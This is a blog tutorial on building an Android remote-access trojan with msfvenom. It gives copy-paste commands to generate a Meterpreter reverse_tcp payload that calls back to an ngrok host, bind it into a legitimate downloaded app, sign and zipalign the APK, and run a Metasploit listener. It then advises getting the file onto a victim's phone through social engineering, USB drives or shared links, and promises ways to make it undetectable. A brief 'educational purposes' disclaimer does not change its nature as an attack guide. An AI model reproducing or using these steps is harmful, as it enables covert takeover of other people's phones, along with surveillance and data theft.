Hacking an Android Device with MSFvenom

May 17, 2020

In this blog, you will get to know how Hacking an Android Device with MSFvenom. It will include Payload generation, Payload signing, payload binding, and ways to make payload FUD.

Hello and welcome back to the EFX Tv UK2Blogger. Today we are going to learn one of the most requested topics Hacking an Android Device with MSFvenom. MSFvenom can exploit Android 5-10, commonly used by various people in this world. Hacking an Android device contain certain things or keyword we need to know about.

The first step is known as Information gathering. Information gathering stands for each and every information we can gather about the victim to Identify his nature and of network and his uses.
After gathering the information we may get some kind of vulnerability in his network so that we can find a perfect exploit for him. After we find the exploit we have to create the payload. That is what we are going to do today. Today we are going to create an Android Msfvenom payload. Because our victim is using Android. We can find the os version and type using the NMAP tool easily. To generate automatic payload visit this link StaticAndroidExploit.

Quick Commands (Copy paste utility)

Generate and Share automated Payload
https://github.com/efxtv/StaticAndroidExploit.git
Over the LAN-------
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15009 R > System_file.apk 

Inside LAN--------
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 LPORT=4449 R > System_file.apk

Bind the APK
msfvenom -x Downloaded_App.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8023 -o NewApp.apk

Generate Key.keystore to Sign APK later on
keytool -genkey -V -keystore location/key.keystore -alias test -keyalg RSA -keysize 2048 -validity 1000
Provide password
Type-->  [test]  [Hit Enter]
Type-->  [test]  [Hit Enter]
Type-->  [test]  [Hit Enter]
Type-->  [test]  [Hit Enter]
Type-->  [TS]  [Hit Enter]
Type-->  [TS]  [Hit Enter]
Type-->  [yes]  [Hit Enter]


Sign APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg ShA1 -keystore location/Build_Apk/Sign_apk_2.0/key.keystore location/Build_Apk/System_file.apk test

Enter the password

Now zip align the APK
zipalign -v 4 android_msfvenom.apk singed_jar.apk

Start postgresql
>service postgresql start

Start METASPLOIT
msfconsole -q

Create Listner
> use multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 0.0.0.0
> set LPORT 4444
> run

Facing Error? @@@@@@
Please spend some time on this blog and identify the required changes.

Before mining deeper I'd like to notify you, this tutorial is only for educational purposes. If you misuse it, you may be responsible for the consequences. Respect the power do not misuse (misuse led to some serious problems).
Okay, so what we are going to do today is. First, we will create an Android Payload using MSFvenom. Before starting the listener we will sign the APK created by MSFvenom. Then, we will execute the Msfconsole and create a listener to run the get the reverse TCP connection back to our system.

How to generate a payload?


>msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15009 R > location/System_file.apk

Info:


>msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15009 R > location/System_file.apk

Note: Must change the text under " " (it can be a user name, IP, Port, Directory Location, Input, Output)


>msfvenom -p android/meterpreter/reverse_tcp LHOST="your IP for local use or use NGROK" LPORT="Port just after NGROK address or you Forwareded" R > "Location_You_Want_To Save_The_/FileName.apk"

Bind the Msfvenom APK with another APK


msfvenom -x Downloaded_App.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8023 -o NewApp.apk

Info


msfvenom -x Downloaded_App.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8023 -o NewApp.apk

Here you can see an extra syntax "-x". This is used to bind the Msfvenom APK with the normal APK file of any application. Make sure there is no way to bind all the applications with Msfvenom. Still, 98% of Apps can be binded.

Generate Keystore to sign the Apk


>keytool -genkey -V -keystore location/Sign_apk_2.0/test.keystore -alias test -keyalg RSA -keysize 2048 -validity 1000

Hit Enter and assign Password.
Provide password ********

Info


>keytool -genkey -V -keystore "Location_You_Want_ToSAve_The_Key_/test.keystore" -alias "Alias Name As test" -keyalg RSA -keysize 2048 -validity 1000

Sign APK with the Keystore


>jarsigner -verbose -sigalg SHA1withRSA -digestalg ShA1 -keystore location/Sign_apk_2.0/key.keystore location/System_file.apk test

Hit enter
Enter the password

Info:


>jarsigner -verbose -sigalg SHA1withRSA -digestalg ShA1 -keystore "Location_You_Want_ToSAve_The_Key_/test.keystore" "Location_Of_The_APK_Generated_/FileName.apk" test

Hit enter
Enter the password "You provided to the test.keystore if you don't remember to make sure you should delete the old key and create a new key".

Zipalign the APK

zipalign -v 4 android_shell.apk singed_jar.apk

It comprises the APK archive so that the working capacity of the APK and performance gets boosted.

Start Listener


>msfconsole -q 

>use multi/handler

>set payload android/meterpreter/reverse_tcp

>set LHOST 0.0.0.0

>set LPORT 4444

>run

"LHOST should remain 0.0.0.0 and LPORT can be different. You may have forwarded the TCP to a different port".

Now copy the files to in a USB_drive or share it with the target using social engineering. What methods we can use?
You can send the APK using apache2, FTP, Physical drive, Creating HTML link the file, and share the link, upload it on one drive and share the link using 160by2.
Click on the image shown below to see the video tutorial. Host a payload and share over the internet using Termux | Termux tutorial

What kind of error you can face?

1st error you may face is 'unable to create APK'. To fix this error you have to check for Java 8 installed on your system or not. Open a terminal and type java -version. If Java 8 is installed but not showing up. You can click here to and get the quick setup of Java 8 on your Linux system. 99% you this post will fix your compiling issue. How to install JAVA 8 on Ubuntu | Java 8 Error

2nd error you can face is 'no such directory found'. To fix this issue you have to make sure you should change the command and assign the proper path to the specific folder you want to access in order to save the file. To check the directory path simply type pwd and hit the enter it will show up the location you are in.

3rd error can be 'jarsigner- command not found'. To fix this error you have to check for the jarsigner. Type jarsigner --version. Sometimes it shows up sometimes it may not. If you are able to sign the APK that means you are good to go.

4th error I've come across is 'LPORT could not be assigned'. To fix this error simply change the port number to a different number. This error occurs because of the unavailability of the desired port you want to select. That has been used by some other system applications or processes. There Is another method to get rid of this error. Run the command below to close the running process associated with that port.

Kill the ports and processes

fuser -k 9999/tcp #kill the running process without showing process name
lsof -i:8080 #to check the running process
kill -9 PID #kill the process
killall php/html/anyservicename #if you know the serive name

This was it for the day, I hope you get what you were looking for. Simply click on EFX Tv and do subscribe to our Youtube Channel. We post on a regular basis. If trouble has not been fixed yet feel free to contact us on our youtube channel. We will definitely look forward to helping you on a priority basis.

Thanks for clicking EFX tv Uk2blogger. We will get back very soon, till then stay home stay safe.